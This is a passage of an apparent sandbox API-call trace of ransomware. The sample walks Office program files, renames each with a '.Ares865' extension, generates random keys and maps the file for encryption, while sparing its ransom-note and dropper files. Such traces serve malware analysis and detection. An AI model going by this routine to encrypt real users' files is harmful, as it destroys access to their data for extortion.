hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.095] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.095] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x30260, lpName=0x0) returned 0x170 [0129.096] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x30260) returned 0x420000 [0129.105] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.106] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.106] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.107] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.107] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.107] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.107] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0129.109] CloseHandle (hObject=0x170) returned 1 [0129.109] CloseHandle (hObject=0x118) returned 1 [0129.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.109] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.110] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x930ea300, ftCreationTime.dwHighDateTime=0x1cba057, ftLastAccessTime.dwLowDateTime=0xadda9080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x930ea300, ftLastWriteTime.dwHighDateTime=0x1cba057, nFileSizeHigh=0x0, nFileSizeLow=0x62978, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INLAUNCH.DLL", cAlternateFileName="")) returned 1 [0129.110] lstrcmpiW (lpString1="INLAUNCH.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.110] lstrcmpiW (lpString1="INLAUNCH.DLL", lpString2="aoldtz.exe") returned 1 [0129.110] lstrcpyW (in: lpString1=0x2cce462, lpString2="INLAUNCH.DLL" | out: lpString1="INLAUNCH.DLL") returned="INLAUNCH.DLL" [0129.110] lstrlenW (lpString="INLAUNCH.DLL") returned 12 [0129.110] lstrlenW (lpString="Ares865") returned 7 [0129.110] lstrcmpiW (lpString1="NCH.DLL", lpString2="Ares865") returned 1 [0129.110] lstrlenW (lpString=".dll") returned 4 [0129.110] lstrcmpiW (lpString1="INLAUNCH.DLL", lpString2=".dll") returned 1 [0129.110] lstrlenW (lpString=".lnk") returned 4 [0129.110] lstrcmpiW (lpString1="INLAUNCH.DLL", lpString2=".lnk") returned 1 [0129.110] lstrlenW (lpString=".ini") returned 4 [0129.110] lstrcmpiW (lpString1="INLAUNCH.DLL", lpString2=".ini") returned 1 [0129.110] lstrlenW (lpString=".sys") returned 4 [0129.110] lstrcmpiW (lpString1="INLAUNCH.DLL", lpString2=".sys") returned 1 [0129.110] lstrlenW (lpString="INLAUNCH.DLL") returned 12 [0129.111] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL.Ares865") returned 69 [0129.111] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\inlaunch.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\inlaunch.dll.ares865"), dwFlags=0x1) returned 1 [0129.113] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\INLAUNCH.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\inlaunch.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.113] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=403832) returned 1 [0129.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.113] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.114] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.114] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.115] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x62c80, lpName=0x0) returned 0x170 [0129.116] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x62c80) returned 0x420000 [0129.131] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.132] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.132] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.132] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.132] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.133] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0129.136] CloseHandle (hObject=0x170) returned 1 [0129.136] CloseHandle (hObject=0x118) returned 1 [0129.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.138] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf4e2500, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0x21ccb710, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdf4e2500, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x13180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOHEV.DLL", cAlternateFileName="")) returned 1 [0129.138] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.138] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2="aoldtz.exe") returned 1 [0129.139] lstrcpyW (in: lpString1=0x2cce462, lpString2="MSOHEV.DLL" | out: lpString1="MSOHEV.DLL") returned="MSOHEV.DLL" [0129.139] lstrlenW (lpString="MSOHEV.DLL") returned 10 [0129.139] lstrlenW (lpString="Ares865") returned 7 [0129.139] lstrcmpiW (lpString1="HEV.DLL", lpString2="Ares865") returned 1 [0129.139] lstrlenW (lpString=".dll") returned 4 [0129.139] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2=".dll") returned 1 [0129.139] lstrlenW (lpString=".lnk") returned 4 [0129.139] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2=".lnk") returned 1 [0129.139] lstrlenW (lpString=".ini") returned 4 [0129.139] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2=".ini") returned 1 [0129.139] lstrlenW (lpString=".sys") returned 4 [0129.139] lstrcmpiW (lpString1="MSOHEV.DLL", lpString2=".sys") returned 1 [0129.139] lstrlenW (lpString="MSOHEV.DLL") returned 10 [0129.139] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL.Ares865") returned 67 [0129.139] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohev.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohev.dll.ares865"), dwFlags=0x1) returned 1 [0129.142] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHEV.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohev.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.142] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=78208) returned 1 [0129.142] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.142] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.142] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.142] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.143] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.143] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.143] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13480, lpName=0x0) returned 0x170 [0129.145] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13480) returned 0x190000 [0129.148] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.149] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.149] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.149] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.150] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.150] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.150] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.150] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.151] CloseHandle (hObject=0x170) returned 1 [0129.151] CloseHandle (hObject=0x118) returned 1 [0129.151] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.151] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.151] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.151] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2994dc00, ftCreationTime.dwHighDateTime=0x1ca91da, ftLastAccessTime.dwLowDateTime=0x21cf1870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2994dc00, ftLastWriteTime.dwHighDateTime=0x1ca91da, nFileSizeHigh=0x0, nFileSizeLow=0x11580, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOHTMED.EXE", cAlternateFileName="")) returned 1 [0129.151] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.151] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2="aoldtz.exe") returned 1 [0129.151] lstrcpyW (in: lpString1=0x2cce462, lpString2="MSOHTMED.EXE" | out: lpString1="MSOHTMED.EXE") returned="MSOHTMED.EXE" [0129.152] lstrlenW (lpString="MSOHTMED.EXE") returned 12 [0129.152] lstrlenW (lpString="Ares865") returned 7 [0129.152] lstrcmpiW (lpString1="MED.EXE", lpString2="Ares865") returned 1 [0129.152] lstrlenW (lpString=".dll") returned 4 [0129.152] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2=".dll") returned 1 [0129.152] lstrlenW (lpString=".lnk") returned 4 [0129.152] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2=".lnk") returned 1 [0129.152] lstrlenW (lpString=".ini") returned 4 [0129.152] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2=".ini") returned 1 [0129.152] lstrlenW (lpString=".sys") returned 4 [0129.152] lstrcmpiW (lpString1="MSOHTMED.EXE", lpString2=".sys") returned 1 [0129.152] lstrlenW (lpString="MSOHTMED.EXE") returned 12 [0129.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE.Ares865") returned 69 [0129.152] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohtmed.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohtmed.exe.ares865"), dwFlags=0x1) returned 1 [0129.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.EXE.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\msohtmed.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.154] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71040) returned 1 [0129.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.154] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.155] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.155] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.155] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11880, lpName=0x0) returned 0x170 [0129.156] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11880) returned 0x190000 [0129.161] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.162] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.162] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.162] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.163] CloseHandle (hObject=0x170) returned 1 [0129.163] CloseHandle (hObject=0x118) returned 1 [0129.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.164] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae1d400, ftCreationTime.dwHighDateTime=0x1cb7015, ftLastAccessTime.dwLowDateTime=0xadc06160, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6ae1d400, ftLastWriteTime.dwHighDateTime=0x1cb7015, nFileSizeHigh=0x0, nFileSizeLow=0x14d68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NAME.DLL", cAlternateFileName="")) returned 1 [0129.164] lstrcmpiW (lpString1="NAME.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.164] lstrcmpiW (lpString1="NAME.DLL", lpString2="aoldtz.exe") returned 1 [0129.164] lstrcpyW (in: lpString1=0x2cce462, lpString2="NAME.DLL" | out: lpString1="NAME.DLL") returned="NAME.DLL" [0129.164] lstrlenW (lpString="NAME.DLL") returned 8 [0129.164] lstrlenW (lpString="Ares865") returned 7 [0129.164] lstrcmpiW (lpString1="AME.DLL", lpString2="Ares865") returned -1 [0129.164] lstrlenW (lpString=".dll") returned 4 [0129.164] lstrcmpiW (lpString1="NAME.DLL", lpString2=".dll") returned 1 [0129.164] lstrlenW (lpString=".lnk") returned 4 [0129.164] lstrcmpiW (lpString1="NAME.DLL", lpString2=".lnk") returned 1 [0129.164] lstrlenW (lpString=".ini") returned 4 [0129.164] lstrcmpiW (lpString1="NAME.DLL", lpString2=".ini") returned 1 [0129.164] lstrlenW (lpString=".sys") returned 4 [0129.164] lstrcmpiW (lpString1="NAME.DLL", lpString2=".sys") returned 1 [0129.164] lstrlenW (lpString="NAME.DLL") returned 8 [0129.165] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL.Ares865") returned 65 [0129.165] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\name.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\name.dll.ares865"), dwFlags=0x1) returned 1 [0129.166] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\NAME.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\name.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.167] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85352) returned 1 [0129.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.167] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.168] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.168] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.168] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15070, lpName=0x0) returned 0x170 [0129.170] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15070) returned 0x190000 [0129.174] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.175] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.175] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.176] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.176] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.176] CloseHandle (hObject=0x170) returned 1 [0129.176] CloseHandle (hObject=0x118) returned 1 [0129.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.177] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2deba300, ftCreationTime.dwHighDateTime=0x1cab99a, ftLastAccessTime.dwLowDateTime=0x220cfc30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2deba300, ftLastWriteTime.dwHighDateTime=0x1cab99a, nFileSizeHigh=0x0, nFileSizeLow=0x3f80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NAMECONTROLPROXY.DLL", cAlternateFileName="NAMECO~1.DLL")) returned 1 [0129.177] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.177] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="aoldtz.exe") returned 1 [0129.177] lstrcpyW (in: lpString1=0x2cce462, lpString2="NAMECONTROLPROXY.DLL" | out: lpString1="NAMECONTROLPROXY.DLL") returned="NAMECONTROLPROXY.DLL" [0129.177] lstrlenW (lpString="NAMECONTROLPROXY.DLL") returned 20 [0129.178] lstrlenW (lpString="Ares865") returned 7 [0129.178] lstrcmpiW (lpString1="OXY.DLL", lpString2="Ares865") returned 1 [0129.178] lstrlenW 